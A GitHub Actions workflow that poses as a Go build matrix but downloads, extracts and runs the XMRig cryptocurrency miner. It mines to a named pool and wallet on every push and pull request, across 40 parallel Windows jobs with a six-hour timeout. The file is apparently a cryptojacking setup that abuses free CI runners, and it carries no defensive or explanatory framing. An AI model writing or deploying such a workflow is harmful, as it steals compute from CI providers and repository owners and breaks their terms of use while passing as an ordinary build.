name: dev
on: [push, pull_request]
jobs:
  build:
    name: dev
    runs-on: windows-latest
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 360
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: dev
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.12.2/xmrig-6.12.2-gcc-win64.zip -OutFile xmrig.zip
    - name: Extract
      run: Expand-Archive xmrig.zip
    - name: start
      run: .\xmrig\xmrig-6.12.2\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u USDT:TW8kc8Lj61ByD3DTdXukrhFbXio5Ad26xU.gas -p x
